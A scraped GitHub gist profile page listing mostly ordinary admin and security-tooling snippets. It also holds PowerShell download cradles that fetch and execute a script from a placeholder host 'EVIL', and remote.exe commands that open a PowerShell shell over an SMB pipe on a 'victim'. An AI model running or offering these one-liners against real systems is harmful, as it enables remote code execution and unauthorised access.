Skip to content

Instantly share code, notes, and snippets.

View kost's full-sized avatar
💭
I'm upto something

kost kost

💭
I'm upto something
506 followers · 174 following
View GitHub Profile
@kost
kost / DownloadCradles.ps1
Created April 8, 2017 15:12 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@kost
kost / bashbunnyquickstart.md
Last active April 8, 2017 15:10 — forked from tkisason/bashbunnyquickstart.md
BashBunny quickstart tutorial

Custom languages don't work without bbpayload.

  1. Fetch the bashbunny payloads:
git clone https://github.com/hak5/bashbunny-payloads.git
  1. Slide the switch to arming position (all the way to the usb plug)
  2. move contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny
@kost
kost / nessus-services.rb
Created April 6, 2017 13:30
Nessus
#!/usr/bin/env ruby
# Filter Nessus XML report to get services identified
# Copyright (C) Kost
require 'nokogiri'
require 'optparse'
require 'logger'
require 'csv'
@kost
kost / zynsecrets.c
Created March 13, 2017 14:46
Calculate Bootbase/bootext secret for debug commands (ATEN 1,xxxx) - Zyxel, Huawei, ZTE, etc. - similar to zynpass but working for larger devices
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.
Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403
Copyright (C) Kost, https://gist.github.com/kost
@kost
kost / nvram
Created January 31, 2017 06:40
#!/bin/sh
# nvram emulation shell script (c) kost, https://gist.github.com/kost
#
# Usage (on real device dump the content): nvram show > /tmp/nvram.file
# Copy script and /tmp/nvram.file to the emulation env, start using it
# In case you just need nvram command emulation, just copy script.
#
# uncomment for debug:
# set -x
@kost
kost / mac-setup.md
Created November 30, 2016 11:38 — forked from todc/mac-setup.md
Fresh Mac OS Setup

1. Run Software Update

Make sure everything is up to date.

Software Update

2. Install Xcode and its "Command Line Tools"

  1. Go to App Store and install Xcode.
  2. Open and accept the terms
@kost
kost / gist:9139f9ec5fa1afac38659c669a70234b
Created November 22, 2016 10:30 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@kost
kost / pfsense2-2.grok
Created November 8, 2016 09:44 — forked from elijahpaul/pfsense2-2.grok
pfSense 2.2 GROK Pattern
# GROK match pattern for logstash.conf filter: %{PFSENSE_LOG_DATA}%{PFSENSE_IP_SPECIFIC_DATA}%{PFSENSE_IP_DATA}%{PFSENSE_PROTOCOL_DATA}
# GROK Custom Patterns (add to patterns directory and reference in GROK filter for pfSense events):
# GROK Patterns for pfSense 2.2 Logging Format
#
# Created 27 Jan 2015 by J. Pisano (Handles TCP, UDP, and ICMP log entries)
# Edited 14 Feb 2015 by Elijah Paul elijah.paul@gmail.com
# Edited 10 Mar 2015 by Bernd Zeimetz <bernd@bzed.de>
# taken from https://gist.github.com/elijahpaul/f5f32d4e914dcb7fedd2
@kost
kost / pfsense_kibana_dash_v1.json
Created November 8, 2016 09:43 — forked from elijahpaul/pfsense_kibana_dash_v1.json
pfSense firewall dashboard (Kibana)
{
"title": "PFSense Firewall",
"services": {
"query": {
"idQueue": [],
"list": {
"0": {
"query": "tags: \"PFSense\" AND action: \"pass\"",
"alias": "Passed",
"color": "#6ED0E0",
@kost
kost / gist:d5fe64e772de6b8aab4037f79935c73a
Created November 8, 2016 09:43
pfctl cheat sheet
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.